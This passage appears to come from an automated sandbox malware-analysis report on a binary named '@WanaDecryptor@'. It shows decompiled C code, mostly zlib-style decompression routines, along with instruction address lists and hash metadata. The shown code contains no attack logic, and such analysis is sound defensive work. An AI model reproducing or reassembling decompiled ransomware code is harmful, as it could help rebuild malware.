									 *(__esi + 0x20) =  *(__esp + 0x28);
									__ecx =  *(__esp + 0x2c);
									__ebx =  *__edi;
									__edi[1] =  *(__esp + 0x2c);
									__ecx = __ebp;
									_push(__eax);
									__ecx = __ebp -  *__edi;
									__edi[2] = __edi[2] + __ebp -  *__edi;
									_push(__edi);
									__edi[2] = __edi[2] + __ebp -  *__edi;
									 *__edi = __ebp;
									_push(__esi);
									 *(__esi + 0x34) = __edx;
									__eax = E0040DDA0();
									__esp = __esp + 0xc;
									return __eax;
								}
								goto L99;
							case 8:
								L97:
								__ecx =  *(__esp + 0x28);
								__eax =  *(__esp + 0x2c);
								 *(__esi + 0x20) =  *(__esp + 0x28);
								 *(__esi + 0x1c) = __ebx;
								__ebx =  *__edi;
								__ecx = __ebp;
								__edi[1] =  *(__esp + 0x2c);
								__eax = __edi[2];
								__ecx = __ebp -  *__edi;
								_push(1);
								__eax = __edi[2] + __ebp -  *__edi;
								_push(__edi);
								__edi[2] = __edi[2] + __ebp -  *__edi;
								 *__edi = __ebp;
								_push(__esi);
								 *(__esi + 0x34) = __edx;
								__eax = E0040DDA0();
								__esp = __esp + 0xc;
								return __eax;
								goto L99;
							case 9:
								__eax =  *(__esp + 0x28);
								__ecx =  *(__esp + 0x2c);
								 *(__esi + 0x20) =  *(__esp + 0x28);
								 *(__esi + 0x1c) = __ebx;
								__ebx =  *__edi;
								__eax = __ebp;
								__edi[1] =  *(__esp + 0x2c);
								__ecx = __edi[2];
								__eax = __ebp -  *__edi;
								_push(0xfffffffd);
								__ecx = __edi[2] + __ebp -  *__edi;
								_push(__edi);
								__edi[2] = __edi[2] + __ebp -  *__edi;
								 *__edi = __ebp;
								_push(__esi);
								 *(__esi + 0x34) = __edx;
								__eax = E0040DDA0();
								__esp = __esp + 0xc;
								return __eax;
								goto L99;
						}
						L85:
						_t362 =  *( *(_t412 + 0x10));
					} while (_t362 <= 9);
					goto L86;
				}
				L99:
			}













                                                      0x0040df36
                                                      0x0040df3b
                                                      0x0040df42
                                                      0x0040df48
                                                      0x0040df4a
                                                      0x0040df4d
                                                      0x0040df51
                                                      0x0040df54
                                                      0x0040df58
                                                      0x0040df5b
                                                      0x0040df61
                                                      0x0040df6b
                                                      0x0040df63
                                                      0x0040df65
                                                      0x0040df65
                                                      0x0040df6d
                                                      0x0040df6f
                                                      0x0040df76
                                                      0x0040e4e7
                                                      0x0040e4ef
                                                      0x0040e4f2
                                                      0x0040e4f9
                                                      0x0040e501
                                                      0x0040e505
                                                      0x0040e506
                                                      0x0040e509
                                                      0x0040e50b
                                                      0x0040e50c
                                                      0x0040e51e
                                                      0x0040df7c
                                                      0x0040df7c
                                                      0x0040df7c
                                                      0x00000000
                                                      0x0040df88
                                                      0x0040e02c
                                                      0x0040e02c
                                                      0x0040e035
                                                      0x0040e03b
                                                      0x0040e041
                                                      0x00000000
                                                      0x0040df99
                                                      0x0040dfa1
                                                      0x0040dfa4
                                                      0x0040dfab
                                                      0x0040dfb3
                                                      0x0040dfb7
                                                      0x0040dfbb
                                                      0x0040dfbe
                                                      0x0040dfc7
                                                      0x0040dfc8
                                                      0x0040dfc9
                                                      0x0040dfca
                                                      0x0040dfd5
                                                      0x0040dfd6
                                                      0x0040dfd7
                                                      0x0040dfe2
                                                      0x0040dfe4
                                                      0x0040dfe7
                                                      0x0040dfeb
                                                      0x0040dfee
                                                      0x0040dff2
                                                      0x0040dff5
                                                      0x0040dffa
                                                      0x0040dffe
                                                      0x0040e008
                                                      0x0040e000
                                                      0x0040e002
                                                      0x0040e002
                                                      0x0040e00c
                                                      0x0040e010
                                                      0x00000000
                                                      0x0040e012
                                                      0x0040e019
                                                      0x0040e021
                                                      0x0040e023
                                                      0x00000000
                                                      0x0040e023
                                                      0x0040e010
                                                      0x00000000
                                                      0x00000000
                                                      0x0040e044
                                                      0x0040e048
                                                      0x0040e04d
                                                      0x0040e051
                                                      0x0040e08d
                                                      0x0040e0a1
                                                      0x0040e0a6
                                                      0x0040e0b3
                                                      0x0040e0b7
                                                      0x0040e0bd
                                                      0x0040e0c1
                                                      0x0040e0c5
                                                      0x0040e0c9
                                                      0x0040e0e6
                                                      0x0040e10d
                                                      0x00000000
                                                      0x0040e113
                                                      0x0040e115
                                                      0x0040e119
                                                      0x0040e51f
                                                      0x0040e525
                                                      0x00000000
                                                      0x0040e11f
                                                      0x0040e11f
                                                      0x0040e125
                                                      0x00000000
                                                      0x0040e125
                                                      0x0040e119
                                                      0x0040e0e8
                                                      0x0040e0e8
                                                      0x0040e0ef
                                                      0x0040e0f9
                                                      0x0040e0ff
                                                      0x0040e102
                                                      0x00000000
                                                      0x0040e102
                                                      0x0040e0cb
                                                      0x0040e0cb
                                                      0x0040e0d2
                                                      0x0040e0d5
                                                      0x0040e0db
                                                      0x00000000
                                                      0x0040e0db
                                                      0x0040e053
                                                      0x0040e053
                                                      0x0040e053
                                                      0x0040e059
                                                      0x00000000
                                                      0x00000000
                                                      0x0040e065
                                                      0x0040e06d
                                                      0x0040e073
                                                      0x0040e076
                                                      0x0040e080
                                                      0x0040e084
                                                      0x0040e087
                                                      0x0040e08b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040e08b
                                                      0x00000000
                                                      0x0040e053
                                                      0x00000000
                                                      0x00000000
                                                      0x0040e12e
                                                      0x0040e132
                                                      0x0040e137
                                                      0x0040e13b
                                                      0x0040e175
                                                      0x0040e175
                                                      0x0040e17c
                                                      0x0040e180
                                                      0x0040e182
                                                      0x0040e186
                                                      0x0040e189
                                                      0x0040e191
                                                      0x0040e193
                                                      0x0040e197
                                                      0x0040e199
                                                      0x0040e19b
                                                      0x0040e19f
                                                      0x0040e1a1
                                                      0x0040e1a4
                                                      0x0040e1aa
                                                      0x0040e1ad
                                                      0x0040e1b0
                                                      0x00000000
                                                      0x0040e13d
                                                      0x0040e13d
                                                      0x0040e13d
                                                      0x0040e143
                                                      0x00000000
                                                      0x00000000
                                                      0x0040e149
                                                      0x0040e14a
                                                      0x0040e14c
                                                      0x0040e150
                                                      0x0040e152
                                                      0x0040e155
                                                      0x0040e158
                                                      0x0040e15a
                                                      0x0040e15e
                                                      0x0040e166
                                                      0x0040e168
                                                      0x0040e16c
                                                      0x0040e16f
                                                      0x0040e173
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040e173
                                                      0x00000000
                                                      0x0040e13d
                                                      0x00000000
                                                      0x00000000
                                                      0x0040e1b5
                                                      0x0040e1b9
                                                      0x0040e1b9
                                                      0x0040e1be
                                                      0x0040e1c2
                                                      0x0040e1fc
                                                      0x0040e1fc
                                                      0x0040e203
                                                      0x0040e207
                                                      0x0040e20d
                                                      0x0040e210
                                                      0x0040e213
                                                      0x0040e215
                                                      0x0040e219
                                                      0x0040e220
                                                      0x0040e222
                                                      0x0040e226
                                                      0x0040e22a
                                                      0x0040e22c
                                                      0x0040e230
                                                      0x0040e232
                                                      0x0040e234
                                                      0x0040e238
                                                      0x0040e25f
                                                      0x0040e569
                                                      0x0040e56d
                                                      0x0040e573
                                                      0x0040e57a
                                                      0x0040e582
                                                      0x0040e585
                                                      0x0040e58c
                                                      0x0040e594
                                                      0x0040e598
                                                      0x0040e599
                                                      0x0040e59c
                                                      0x0040e59e
                                                      0x0040e59f
                                                      0x0040e5b1
                                                      0x0040e265
                                                      0x0040e265
                                                      0x0040e269
                                                      0x0040e27a
                                                      0x0040e27d
                                                      0x00000000
                                                      0x0040e27d
                                                      0x0040e23a
                                                      0x0040e23a
                                                      0x0040e23e
                                                      0x0040e241
                                                      0x0040e248
                                                      0x0040e24b
                                                      0x0040e251
                                                      0x0040e254
                                                      0x00000000
                                                      0x0040e254
                                                      0x0040e1c4
                                                      0x0040e1c4
                                                      0x0040e1c4
                                                      0x0040e1ca
                                                      0x00000000
                                                      0x00000000
                                                      0x0040e1d0
                                                      0x0040e1d1
                                                      0x0040e1d3
                                                      0x0040e1d7
                                                      0x0040e1d9
                                                      0x0040e1dc
                                                      0x0040e1df
                                                      0x0040e1e1
                                                      0x0040e1e5
                                                      0x0040e1ed
                                                      0x0040e1ef
                                                      0x0040e1f3
                                                      0x0040e1f6
                                                      0x0040e1fa
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040e1fa
                                                      0x00000000
                                                      0x0040e1c4
                                                      0x00000000
                                                      0x00000000
                                                      0x0040e286
                                                      0x0040e28a
                                                      0x0040e28f
                                                      0x0040e293
                                                      0x0040e2cf
                                                      0x0040e2cf
                                                      0x0040e2d6
                                                      0x0040e2da
                                                      0x0040e2dc
                                                      0x0040e2e0
                                                      0x0040e2e3
                                                      0x0040e2eb
                                                      0x0040e2ed
                                                      0x0040e2f1
                                                      0x0040e2f3
                                                      0x0040e2f5
                                                      0x0040e2f9
                                                      0x00000000
                                                      0x0040e295
                                                      0x0040e295
                                                      0x0040e295
                                                      0x0040e29b
                                                      0x00000000
                                                      0x00000000
                                                      0x0040e2a1
                                                      0x0040e2a3
                                                      0x0040e2a4
                                                      0x0040e2a7
                                                      0x0040e2ab
                                                      0x0040e2ad
                                                      0x0040e2af
                                                      0x0040e2b1
                                                      0x0040e2b5
                                                      0x0040e2b8
                                                      0x0040e2c0
                                                      0x0040e2c2
                                                      0x0040e2c6
                                                      0x0040e2c9
                                                      0x0040e2cd
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040e2cd
                                                      0x0040e52e
                                                      0x0040e532
                                                      0x0040e535
                                                      0x0040e541
                                                      0x0040e54a
                                                      0x0040e54c
                                                      0x0040e54f
                                                      0x0040e556
                                                      0x0040e557
                                                      0x0040e558
                                                      0x0040e568
                                                      0x0040e568
                                                      0x00000000
                                                      0x00000000
                                                      0x0040e2ff
                                                      0x0040e2ff
                                                      0x0040e303
                                                      0x0040e305
                                                      0x0040e308
                                                      0x0040e30d
                                                      0x0040e311
                                                      0x0040e313
                                                      0x0040e316
                                                      0x0040e318
                                                      0x0040e31c
                                                      0x0040e326
                                                      0x0040e326
                                                      0x0040e328
                                                      0x0040e32d
                                                      0x00000000
                                                      0x00000000
                                                      0x0040e322
                                                      0x0040e322
                                                      0x0040e32f
                                                      0x0040e32f
                                                      0x0040e333
                                                      0x0040e337
                                                      0x0040e33c
                                                      0x0040e340
                                                      0x0040e346
                                                      0x0040e348
                                                      0x00000000
                                                      0x0040e34e
                                                      0x0040e34e
                                                      0x0040e353
                                                      0x0040e357
                                                      0x0040e378
                                                      0x0040e378
                                                      0x0040e37b
                                                      0x0040e37f
                                                      0x0040e380
                                                      0x0040e381
                                                      0x0040e382
                                                      0x0040e387
                                                      0x0040e38a
                                                      0x0040e38e
                                                      0x0040e391
                                                      0x0040e396
                                                      0x0040e39a
                                                      0x0040e3a1
                                                      0x0040e3a4
                                                      0x0040e39c
                                                      0x0040e39c
                                                      0x0040e39e
                                                      0x0040e39e
                                                      0x0040e3a6
                                                      0x0040e3a9
                                                      0x0040e3af
                                                      0x0040e3b3
                                                      0x0040e3b5
                                                      0x0040e3b8
                                                      0x0040e3be
                                                      0x0040e3d3
                                                      0x0040e3c0
                                                      0x0040e3c0
                                                      0x0040e3c4
                                                      0x0040e3cb
                                                      0x0040e3cf
                                                      0x0040e3c6
                                                      0x0040e3c6
                                                      0x0040e3c8
                                                      0x0040e3c8
                                                      0x0040e3c4
                                                      0x0040e3be
                                                      0x0040e3d9
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040e359
                                                      0x0040e359
                                                      0x0040e35c
                                                      0x0040e361
                                                      0x00000000
                                                      0x0040e363
                                                      0x0040e363
                                                      0x0040e367
                                                      0x0040e36e
                                                      0x0040e372
                                                      0x0040e369
                                                      0x0040e369
                                                      0x0040e36b
                                                      0x0040e36b
                                                      0x0040e376
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040e376
                                                      0x0040e361
                                                      0x0040e357
                                                      0x00000000
                                                      0x0040e3df
                                                      0x0040e3df
                                                      0x0040e3e3
                                                      0x0040e3e4
                                                      0x0040e3ec
                                                      0x0040e3ee
                                                      0x0040e3f1
                                                      0x0040e3f5
                                                      0x0040e3f6
                                                      0x0040e3fa
                                                      0x0040e3fe
                                                      0x0040e402
                                                      0x0040e404
                                                      0x0040e407
                                                      0x0040e407
                                                      0x0040e40b
                                                      0x0040e40f
                                                      0x0040e40f
                                                      0x0040e40f
                                                      0x0040e418
                                                      0x00000000
                                                      0x00000000
                                                      0x0040e41f
                                                      0x0040e4b6
                                                      0x0040e4b6
                                                      0x0040e4ba
                                                      0x0040e4bb
                                                      0x0040e4bc
                                                      0x0040e4c4
                                                      0x0040e4c7
                                                      0x0040e4cb
                                                      0x0040e4ce
                                                      0x0040e4d2
                                                      0x0040e4d2
                                                      0x00000000
                                                      0x0040e425
                                                      0x0040e425
                                                      0x0040e42a
                                                      0x0040e42e
                                                      0x0040e44f
                                                      0x0040e44f
                                                      0x0040e452
                                                      0x0040e456
                                                      0x0040e457
                                                      0x0040e458
                                                      0x0040e459
                                                      0x0040e45e
                                                      0x0040e461
                                                      0x0040e465
                                                      0x0040e468
                                                      0x0040e46d
                                                      0x0040e471
                                                      0x0040e478
                                                      0x0040e47b
                                                      0x0040e473
                                                      0x0040e473
                                                      0x0040e475
                                                      0x0040e475
                                                      0x0040e47d
                                                      0x0040e480
                                                      0x0040e486
                                                      0x0040e48a
                                                      0x0040e48c
                                                      0x0040e48f
                                                      0x0040e495
                                                      0x0040e4aa
                                                      0x0040e497
                                                      0x0040e497
                                                      0x0040e49b
                                                      0x0040e4a2
                                                      0x0040e4a6
                                                      0x0040e49d
                                                      0x0040e49d
                                                      0x0040e49f
                                                      0x0040e49f
                                                      0x0040e49b
                                                      0x0040e495
                                                      0x0040e4b0
                                                      0x0040e5b2
                                                      0x0040e5b2
                                                      0x0040e5b6
                                                      0x0040e5ba
                                                      0x0040e5bd
                                                      0x0040e5c0
                                                      0x0040e5c2
                                                      0x0040e5c4
                                                      0x0040e5c7
                                                      0x0040e5ca
                                                      0x0040e5cc
                                                      0x0040e5ce
                                                      0x0040e5d0
                                                      0x0040e5d3
                                                      0x0040e5d7
                                                      0x0040e5d8
                                                      0x0040e5d9
                                                      0x0040e5da
                                                      0x0040e5dd
                                                      0x0040e5e2
                                                      0x0040e5ec
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040e430
                                                      0x0040e430
                                                      0x0040e433
                                                      0x0040e438
                                                      0x00000000
                                                      0x0040e43a
                                                      0x0040e43a
                                                      0x0040e43e
                                                      0x0040e445
                                                      0x0040e449
                                                      0x0040e440
                                                      0x0040e440
                                                      0x0040e442
                                                      0x0040e442
                                                      0x0040e44d
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040e44d
                                                      0x0040e438
                                                      0x0040e42e
                                                      0x00000000
                                                      0x00000000
                                                      0x0040e5f0
                                                      0x0040e5f2
                                                      0x0040e5f6
                                                      0x0040e5f9
                                                      0x0040e5fa
                                                      0x0040e5fb
                                                      0x0040e5fb
                                                      0x0040e5ff
                                                      0x0040e602
                                                      0x0040e606
                                                      0x0040e607
                                                      0x0040e608
                                                      0x0040e609
                                                      0x0040e60e
                                                      0x0040e611
                                                      0x0040e614
                                                      0x0040e619
                                                      0x0040e652
                                                      0x0040e656
                                                      0x00000000
                                                      0x0040e61b
                                                      0x0040e61b
                                                      0x0040e61f
                                                      0x0040e622
                                                      0x0040e625
                                                      0x0040e629
                                                      0x0040e62b
                                                      0x0040e62e
                                                      0x0040e630
                                                      0x0040e631
                                                      0x0040e636
                                                      0x0040e638
                                                      0x0040e639
                                                      0x0040e63c
                                                      0x0040e63e
                                                      0x0040e63f
                                                      0x0040e642
                                                      0x0040e647
                                                      0x0040e651
                                                      0x0040e651
                                                      0x00000000
                                                      0x00000000
                                                      0x0040e65c
                                                      0x0040e65c
                                                      0x0040e660
                                                      0x0040e664
                                                      0x0040e667
                                                      0x0040e66a
                                                      0x0040e66c
                                                      0x0040e66e
                                                      0x0040e671
                                                      0x0040e674
                                                      0x0040e676
                                                      0x0040e678
                                                      0x0040e67a
                                                      0x0040e67b
                                                      0x0040e67e
                                                      0x0040e680
                                                      0x0040e681
                                                      0x0040e684
                                                      0x0040e689
                                                      0x0040e693
                                                      0x00000000
                                                      0x00000000
                                                      0x0040e694
                                                      0x0040e698
                                                      0x0040e69c
                                                      0x0040e69f
                                                      0x0040e6a2
                                                      0x0040e6a4
                                                      0x0040e6a6
                                                      0x0040e6a9
                                                      0x0040e6ac
                                                      0x0040e6ae
                                                      0x0040e6b0
                                                      0x0040e6b2
                                                      0x0040e6b3
                                                      0x0040e6b6
                                                      0x0040e6b8
                                                      0x0040e6b9
                                                      0x0040e6bc
                                                      0x0040e6c1
                                                      0x0040e6cb
                                                      0x00000000
                                                      0x00000000
                                                      0x0040e4d8
                                                      0x0040e4dc
                                                      0x0040e4de
                                                      0x00000000
                                                      0x0040df7c
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9b8eabf12bd29c3c38fc8e7bc8212d9d6bf0432072041c2816a53c5bd799d9a5
                                                      • Instruction ID: e5ae74944e208cb03c60f72bb217c75502e03934b58f7a9b199ce6c2a9593854
                                                      • Opcode Fuzzy Hash: 9b8eabf12bd29c3c38fc8e7bc8212d9d6bf0432072041c2816a53c5bd799d9a5
                                                      • Instruction Fuzzy Hash: 5E2239B46083018FC308CF29D590A2ABBE1FF88354F148A6EE49AD7751D734E955CF5A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00410460 Relevance: .4, Instructions: 377COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 98%
                                                      			E00410460(intOrPtr* _a4, signed int _a8) {
				signed int* _t124;
				signed int _t172;
				signed int _t176;
				signed int _t225;
				intOrPtr* _t229;
				signed int _t230;

				_t229 = _a4;
				if(_t229 == 0) {
					L36:
					return 0xfffffffe;
				} else {
					_t124 =  *(_t229 + 0x1c);
					if(_t124 != 0 &&  *_t229 != 0) {
						_t176 =  *_t124;
						_t225 = 0xfffffffb;
						_t172 = (0 | _a8 != 0x00000004) - 0x00000001 & 0xfffffffb;
						_a8 = _t172;
						if(_t176 <= 0xd) {
							_t230 = 5;
							do {
								switch( *((intOrPtr*)(_t176 * 4 +  &M00410860))) {
									case 0:
										_t177 =  *((intOrPtr*)(_t229 + 4));
										if(_t177 == 0) {
											goto L39;
										} else {
											 *((intOrPtr*)(_t229 + 4)) = _t177 - 1;
											_t225 = _t172;
											 *((intOrPtr*)(_t229 + 8)) =  *((intOrPtr*)(_t229 + 8)) + 1;
											_t124[1] = 0;
											_t126 =  *(_t229 + 0x1c);
											 *_t229 =  *_t229 + 1;
											if((_t126[1] & 0x0000000f) == 8) {
												if((_t126[1] >> 4) + 8 <= _t126[4]) {
													 *_t126 = 1;
													goto L12;
												} else {
													 *_t126 = 0xd;
													 *(_t229 + 0x18) = "invalid window size";
													goto L34;
												}
											} else {
												 *_t126 = 0xd;
												 *(_t229 + 0x18) = "unknown compression method";
												goto L34;
											}
										}
										goto L54;
									case 1:
										L12:
										_t127 =  *((intOrPtr*)(_t229 + 4));
										if(_t127 == 0) {
											goto L39;
										} else {
											 *((intOrPtr*)(_t229 + 4)) = _t127 - 1;
											_t225 = _t172;
											_t173 =  *(_t229 + 0x1c);
											 *((intOrPtr*)(_t229 + 8)) =  *((intOrPtr*)(_t229 + 8)) + 1;
											_t131 =  *_t229;
											_t188 =  *_t131;
											 *_t229 = _t131 + 1;
											if((_t173[1] << 8) % 0x1f == 0) {
												if((_t188 & 0x00000020) != 0) {
													_t174 = _a8;
													 *( *(_t229 + 0x1c)) = 2;
													goto L38;
												} else {
													 *_t173 = 7;
													_t172 = _a8;
													_t230 = 5;
													goto L35;
												}
											} else {
												 *_t173 = 0xd;
												_t172 = _a8;
												_t230 = 5;
												 *(_t229 + 0x18) = "incorrect header check";
												( *(_t229 + 0x1c))[1] = 5;
												goto L35;
											}
										}
										goto L54;
									case 2:
										L38:
										_t138 =  *((intOrPtr*)(_t229 + 4));
										if(_t138 != 0) {
											 *((intOrPtr*)(_t229 + 8)) =  *((intOrPtr*)(_t229 + 8)) + 1;
											 *((intOrPtr*)(_t229 + 4)) = _t138 - 1;
											_t226 = _t174;
											( *(_t229 + 0x1c))[2] = 0 << 0x18;
											 *_t229 =  *_t229 + 1;
											 *( *(_t229 + 0x1c)) = 3;
											goto L41;
										} else {
											goto L39;
										}
										goto L54;
									case 3:
										L41:
										_t143 =  *((intOrPtr*)(_t229 + 4));
										if(_t143 != 0) {
											 *((intOrPtr*)(_t229 + 4)) = _t143 - 1;
											 *((intOrPtr*)(_t229 + 8)) =  *((intOrPtr*)(_t229 + 8)) + 1;
											_t227 = _t174;
											( *(_t229 + 0x1c))[2] = ( *(_t229 + 0x1c))[2] + (0 << 0x10);
											 *_t229 =  *_t229 + 1;
											 *( *(_t229 + 0x1c)) = 4;
											goto L44;
										} else {
											return _t226;
										}
										goto L54;
									case 4:
										L44:
										_t150 =  *((intOrPtr*)(_t229 + 4));
										if(_t150 != 0) {
											 *((intOrPtr*)(_t229 + 4)) = _t150 - 1;
											 *((intOrPtr*)(_t229 + 8)) =  *((intOrPtr*)(_t229 + 8)) + 1;
											_t228 = _t174;
											( *(_t229 + 0x1c))[2] = ( *(_t229 + 0x1c))[2] + (0 << 8);
											 *_t229 =  *_t229 + 1;
											 *( *(_t229 + 0x1c)) = 5;
											goto L47;
										} else {
											return _t227;
										}
										goto L54;
									case 5:
										L47:
										_t158 =  *((intOrPtr*)(_t229 + 4));
										if(_t158 != 0) {
											 *((intOrPtr*)(_t229 + 4)) = _t158 - 1;
											 *((intOrPtr*)(_t229 + 8)) =  *((intOrPtr*)(_t229 + 8)) + 1;
											( *(_t229 + 0x1c))[2] = ( *(_t229 + 0x1c))[2];
											 *_t229 =  *_t229 + 1;
											_t163 =  *(_t229 + 0x1c);
											 *(_t229 + 0x30) = _t163[2];
											 *_t163 = 6;
											return 2;
										} else {
											return _t228;
										}
										goto L54;
									case 6:
										 *(__esi[7]) = 0xd;
										__eax = __esi[7];
										__esi[6] = "need dictionary";
										 *((intOrPtr*)(__esi[7] + 4)) = 0;
										__eax = 0xfffffffe;
										return 0xfffffffe;
										goto L54;
									case 7:
										_push(__edi);
										_push(__esi);
										_push( *((intOrPtr*)(__eax + 0x14)));
										__edi = E0040E840();
										__esp = __esp + 0xc;
										if(__edi != 0xfffffffd) {
											if(__edi == 0) {
												__edi = __ebx;
											}
											if(__edi != 1) {
												goto L39;
											} else {
												__eax = __esi[7];
												__edi = __ebx;
												__eax = E0040E720( *((intOrPtr*)(__esi[7] + 0x14)), __esi, __esi[7] + 4);
												__eax = __esi[7];
												if( *((intOrPtr*)(__eax + 0xc)) == 0) {
													 *__eax = 8;
													goto L25;
												} else {
													 *__eax = 0xc;
													goto L35;
												}
											}
										} else {
											 *(__esi[7]) = 0xd;
											__eax = __esi[7];
											 *((intOrPtr*)(__eax + 4)) = 0;
											goto L35;
										}
										goto L54;
									case 8:
										L25:
										__eax = __esi[1];
										if(__eax == 0) {
											goto L39;
										} else {
											__esi[1] = __eax;
											__esi[2] = __esi[2] + 1;
											__esi[2] = __esi[2] + 1;
											__eax =  *__esi;
											__edi = __ebx;
											 *(__esi[7] + 8) = 0 << 0x18;
											 *__esi =  *__esi + 1;
											 *__esi =  *__esi + 1;
											__eax = __esi[7];
											 *(__esi[7]) = 9;
											goto L27;
										}
										goto L54;
									case 9:
										L27:
										__eax = __esi[1];
										if(__eax == 0) {
											goto L39;
										} else {
											__eax = __eax - 1;
											__esi[2] = __esi[2] + 1;
											__esi[1] = __eax;
											__eax = __esi[7];
											__edi = __ebx;
											 *(__esi[7] + 8) =  *(__esi[7] + 8) + (0 << 0x10);
											 *__esi =  *__esi + 1;
											 *__esi =  *__esi + 1;
											__eax = __esi[7];
											 *(__esi[7]) = 0xa;
											goto L29;
										}
										goto L54;
									case 0xa:
										L29:
										__eax = __esi[1];
										if(__eax == 0) {
											goto L39;
										} else {
											__eax = __eax - 1;
											__esi[2] = __esi[2] + 1;
											__esi[1] = __eax;
											__eax = __esi[7];
											__edi = __ebx;
											 *(__esi[7] + 8) =  *(__esi[7] + 8) + (0 << 8);
											 *__esi =  *__esi + 1;
											 *__esi =  *__esi + 1;
											__eax = __esi[7];
											 *(__esi[7]) = 0xb;
											goto L31;
										}
										goto L54;
									case 0xb:
										L31:
										__eax = __esi[1];
										if(__eax == 0) {
											L39:
											return _t225;
										} else {
											__esi[1] = __eax;
											__eax = __esi[7];
											__esi[2] = __esi[2] + 1;
											__edi = __ebx;
											 *(__esi[7] + 8) =  *(__esi[7] + 8);
											 *__esi =  *__esi + 1;
											 *__esi =  *__esi + 1;
											__eax = __esi[7];
											if( *((intOrPtr*)(__eax + 4)) ==  *((intOrPtr*)(__eax + 8))) {
												 *(__esi[7]) = 0xc;
												goto L52;
											} else {
												 *__eax = 0xd;
												__esi[6] = "incorrect data check";
												L34:
												( *(_t229 + 0x1c))[1] = _t230;
												goto L35;
											}
										}
										goto L54;
									case 0xc:
										L52:
										__eax = 1;
										return 1;
										goto L54;
									case 0xd:
										__eax = 0xfffffffd;
										return 0xfffffffd;
										goto L54;
								}
								L35:
								_t124 =  *(_t229 + 0x1c);
								_t176 =  *_t124;
							} while (_t176 <= 0xd);
						}
					}
					goto L36;
				}
				L54:
			}









                                                      0x00410463
                                                      0x0041046a
                                                      0x0041070e
                                                      0x00410714
                                                      0x00410470
                                                      0x00410470
                                                      0x00410475
                                                      0x0041048d
                                                      0x00410493
                                                      0x00410498
                                                      0x0041049e
                                                      0x004104a2
                                                      0x004104a8
                                                      0x004104ad
                                                      0x004104ad
                                                      0x00000000
                                                      0x004104b4
                                                      0x004104b9
                                                      0x00000000
                                                      0x004104bf
                                                      0x004104c2
                                                      0x004104c9
                                                      0x004104cb
                                                      0x004104d2
                                                      0x004104d5
                                                      0x004104e4
                                                      0x004104e6
                                                      0x00410508
                                                      0x0041051c
                                                      0x00000000
                                                      0x0041050a
                                                      0x0041050a
                                                      0x00410510
                                                      0x00000000
                                                      0x00410510
                                                      0x004104e8
                                                      0x004104e8
                                                      0x004104ee
                                                      0x00000000
                                                      0x004104ee
                                                      0x004104e6
                                                      0x00000000
                                                      0x00000000
                                                      0x00410522
                                                      0x00410522
                                                      0x00410527
                                                      0x00000000
                                                      0x0041052d
                                                      0x00410530
                                                      0x00410537
                                                      0x00410539
                                                      0x0041053c
                                                      0x0041053f
                                                      0x00410548
                                                      0x0041054b
                                                      0x00410559
                                                      0x0041057f
                                                      0x00410718
                                                      0x00410721
                                                      0x00000000
                                                      0x00410585
                                                      0x00410585
                                                      0x0041058b
                                                      0x0041058f
                                                      0x00000000
                                                      0x0041058f
                                                      0x0041055b
                                                      0x0041055b
                                                      0x00410564
                                                      0x00410568
                                                      0x0041056d
                                                      0x00410574
                                                      0x00000000
                                                      0x00410574
                                                      0x00410559
                                                      0x00000000
                                                      0x00000000
                                                      0x00410727
                                                      0x00410727
                                                      0x0041072c
                                                      0x0041073c
                                                      0x00410741
                                                      0x00410749
                                                      0x0041074e
                                                      0x00410757
                                                      0x00410759
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0041075f
                                                      0x0041075f
                                                      0x00410764
                                                      0x00410770
                                                      0x00410779
                                                      0x00410781
                                                      0x0041078b
                                                      0x00410794
                                                      0x00410796
                                                      0x00000000
                                                      0x00410766
                                                      0x0041076c
                                                      0x0041076c
                                                      0x00000000
                                                      0x00000000
                                                      0x0041079c
                                                      0x0041079c
                                                      0x004107a1
                                                      0x004107ad
                                                      0x004107b6
                                                      0x004107be
                                                      0x004107c8
                                                      0x004107ce
                                                      0x004107d3
                                                      0x00000000
                                                      0x004107a3
                                                      0x004107a9
                                                      0x004107a9
                                                      0x00000000
                                                      0x00000000
                                                      0x004107d5
                                                      0x004107d5
                                                      0x004107da
                                                      0x004107ea
                                                      0x004107f0
                                                      0x004107fd
                                                      0x00410803
                                                      0x00410805
                                                      0x0041080b
                                                      0x0041080f
                                                      0x0041081c
                                                      0x004107dc
                                                      0x004107e2
                                                      0x004107e2
                                                      0x00000000
                                                      0x00000000
                                                      0x00410821
                                                      0x00410827
                                                      0x0041082a
                                                      0x00410832
                                                      0x0041083a
                                                      0x00410840
                                                      0x00000000
                                                      0x00000000
                                                      0x0041059c
                                                      0x0041059d
                                                      0x0041059e
                                                      0x004105a4
                                                      0x004105a6
                                                      0x004105ac
                                                      0x004105c8
